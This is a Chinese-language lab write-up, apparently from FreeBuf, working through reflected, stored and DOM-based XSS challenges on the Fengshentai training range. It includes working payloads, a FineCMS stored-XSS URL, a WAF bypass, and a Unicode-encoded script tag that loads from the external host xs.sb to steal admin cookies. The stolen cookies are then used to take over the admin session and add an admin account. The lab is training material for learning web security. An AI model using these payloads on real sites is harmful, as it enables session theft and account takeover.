freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【封神台】前端渗透 XSS wp
【封神台】前端渗透 XSS wp
G孤桜懶契Y 2021-08-05 13:54:59 139783

前言

掌控安全里面的靶场前端渗透/XSS,学习一下!

反射型XSS

环境:http://b-ref-xss-1s.lab.aqlab.cn/

了解一下

一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了
XSS一般在什么业务场景容易遇见?
重灾区:评论区、留言区、个人信息、订单信息等。
针对型:站内信、网页即时通讯、私信、意见反馈。
存在风险:搜索框、当前目录、图片属性等。

遵循一个原则,见框就X

image-20210805092731188

发现并没有什么反应,审计元素看看代码F12

image-20210805092837982

输入双引号发现被转义了,那就输入单引号来闭合

' oninput=alert(/xss/)

image-20210805093254599

用\转义,或者用//来注释都行

' oninput=alert(/xss/) \

image-20210805093354847

接着输入一个任意字符就可以拿flag

image-20210805093436060

存储型XSS

环境:http://59.63.200.79:8082/

先打开看看,发现是FineCMS v5.3.0,因为提示是存储型XSS。百度一下,看看有没有相关的漏洞

image-20210805093636171

百度了一下,发现这个cms邮件处url有xss漏洞

payload

http://59.63.200.79:8082/index.php?c=mail&m=<script>alert(/xss/)</script>

image-20210805094003613

因为这个邮件是直接发给管理员,根据说明,所以我们得想办法窃取管理员cookie进入后台。

先找一个xss平台导航

image-20210805100643223

注册一个账号,然后进去创建一个新项目

image-20210805100727610

我们只是获取cookie,就选超强默认模块基础默认模块,有兴趣可以看看他们说明

image-20210805100830687

就用最短代码吧

image-20210805100905290

payload

http://59.63.200.79:8082/index.php?c=mail&m=极限最短代码

image-20210805100954668

刷新一下项目页面就收到了cookie了,因为有robot自动访问后台,得到flag了。

image-20210805101110064

根据cms源码可以知道管理员路径是admin.php,我们尝试用cookie登陆下后台

member_cookie=d256812b83f3751716e6
member_uid=1

将这个两个cookie值加入

image-20210805102514228

接着我们再访问管理员页面

http://59.63.200.79:8082/admin.php

image-20210805102545578

然后就是基本操作,添加一个管理员账户,以后就不用cookie了

image-20210805102705599

DOM型XSS

环境:http://59.63.200.79:8014/dom_xss/

注意:被waf拦截就将cookie清空

了解一些基础知识

DOM XSS注入核心代码document,程序和脚本可以通过dom接口来修改前端网页

document.cookie 读取网页cookie,可设置cookie

document.domain 返回当前IP

document.lastModified 获得页面最后修改时间

document.write向文档中写入HTML或JS代码

一打开靶场,检查了下元素,就看到document.write

image-20210805103724506

试了下,这个write截取浏览器后面输入的所有字符串向文档写入然后当做代码执行,因为我们访问浏览器的时候,是生成了文档页面的所以,这个dom型就是向文档中写入代码,然后被页面执行

image-20210805103901000

尝试一下恶意代码,估计过滤了script被waf拦截了

image-20210805103936688

所以有两种做法,第一种是绕过waf,因为这个waf太老了,绕了也没啥意义但是还是给个payload

http://59.63.200.79:8014/dom_xss/index.php/.txt?id=<img src=x onerror=alert(/dom-xss/)

image-20210805104907949

因为DOM型XSS也是只能在该页面插入html代码,所以这个也是反射型的一种,我们用另一种方法,因为js能解码native编码

直接去导航站长工具

image-20210805105557481

找到native编码互转

image-20210805105624726

可以直接绕过

image-20210805105655587

这样就会出现一个问题,反射型和dom型XSS怎么利用?一样的构造一个url让其他人点一样可以获取cookie,将我们的极限短xss代码转换为native形式

image-20210805110006489

测试一下是否有用,访问了一下,明显拿到我自己电脑的cookie和信息了

http://59.63.200.79:8014/dom_xss/?id=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e

image-20210805110120932

所以我们想要利用个反射型的xss得先打开建议和投诉页面http://59.63.200.79:8014/dom_xss/dom.html,然后将我们构造的恶意代码发给客服机器人,访问我们就可以获取管理员cookie

image-20210805110334088

刷新一下我们的xss项目平台,获取到了cookie

image-20210805110425417

我的个人博客

## 孤桜懶契:http://gylq.github.io

# 渗透测试 # web安全 # 数据安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 G孤桜懶契Y 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
封神台靶场
相关推荐
Windows 权限提升:SeImpersonatePrivilege 金币
Windows 权限提升:SeImpersonatePrivilege

网络安全

在本文中,我们将展示在运行 Windows Server 2019 计算机的 IIS 服务器上创建实验室环境的过程。

无名草

390163围观  · 131喜欢 2021-08-07

供应链漏洞:接管 Atlassian 账户
供应链漏洞:接管 Atlassian 账户

数据安全

Atlassian 将此称为“The Rise of Work Anywhere”(随处工作的兴起),对大流行期间远程工作的性质进行了研究。

FreeBuf_289352

118747围观  · 9喜欢 2021-08-07

红队实战手册
红队实战手册

Web安全

还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽。

MrM

322653围观  · 11收藏  · 69喜欢 2021-08-07

Java审计之SQL注入
Java审计之SQL注入

Web安全

SQL是操作数据库数据的结构化查询语言,web应用程序的应用数据与后台数据库中的数据产生交互时会采用SQL。

耳双

109462围观 2021-08-06

msf利用bypassuac提权,创建新用户
msf利用bypassuac提权,创建新用户

Web安全

在获得服务器的webshell后,我们可以使用msf来进行提权,这里要用到msf的meterpreter模块,来,跟我大声念:msf,yyd...

J2W

342747围观  · 18喜欢 2021-08-22

G孤桜懶契Y LV.4
这家伙太懒了,还未填写个人描述!
  • 11 文章数
  • 11 关注者
基于在线靶场的Apache Log4j任意代码执行复现
2021-12-20
CS4.4绕过vultr特征检测修改checksum8算法
2021-12-03
[封神台]Cobalt strike超简单自动化拿域控!
2021-09-10
文章目录
前言
    反射型XSS
      存储型XSS
        DOM型XSS
          我的个人博客